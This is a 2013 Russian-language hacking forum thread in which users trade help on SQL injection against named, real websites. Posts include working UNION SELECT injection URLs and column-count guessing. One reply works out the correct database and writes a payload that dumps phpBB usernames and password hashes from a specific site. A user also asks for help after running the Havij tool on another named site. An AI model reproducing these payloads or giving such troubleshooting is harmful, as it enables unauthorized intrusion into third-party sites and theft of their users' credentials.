21.08.2013, 00:45
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от ishenko
есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?
Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.
|
|
|
21.08.2013, 12:45
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Я уже задолбался подбирать столбцы
Код:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+
http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так |
|
|
|
21.08.2013, 22:29
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами:
7278806
Репутация:
26
|
|
Сообщение от Unknowhacker
Я уже задолбался подбирать столбцы
Код:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+
http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
|
|
|
|
22.08.2013, 12:44
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от Ravenous
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
Разочарование при вводе version() - I don't like you...
|
|
|
|
22.08.2013, 13:12
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version
|
|
|
|
23.08.2013, 11:55
|
|
Новичок
Регистрация: 24.07.2011
Сообщений: 23
С нами:
7791446
Репутация:
10
|
|
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
|
|
|
|
23.08.2013, 14:28
|
|
Новичок
Регистрация: 13.06.2008
Сообщений: 1
С нами:
9426113
Репутация:
0
|
|
Нашел единственную уязвимость на сайте.Начал анализ
Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f} ffw иероглифы какие то и скобки.Скажите что делать?
|
|
|
|
23.08.2013, 14:52
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами:
9427499
Репутация:
22
|
|
Сообщение от danil7493
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
Код HTML:
http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_password),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_users+LIMIT+1,1--&page=1
|
|
|
|
23.08.2013, 15:06
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от danil7493
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
Зачем скрывать доменное имя, если в большинстве случаев оно схоже с именем юзера или базы?! В Вашем случае, я так понимаю, http://www.trunov.com
Далее несложно определить, что курутиться несколько баз данных:
помимо information_schema и trunovc7_loy есть еще trunovc7_forum, которая и содержит необходимую Вам таблицу, то есть запрос примет вид ... from trunovc7_forum.phpbb_users.
И еще момент: колонки с названием passwordнет в таблице phpbb_users, есть user_password.
Итог:
Сообщение от None
http://www._____.com/news.php?newsid=-397+union+select+1,2,group_concat(0x3a,username,us er_password),4,5,6,7,8,9+from+trunovc7_forum.phpbb _users --+
|
|
|
|
23.08.2013, 15:06
|
|
Новичок
Регистрация: 13.06.2008
Сообщений: 1
С нами:
9426113
Репутация:
0
|
|
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
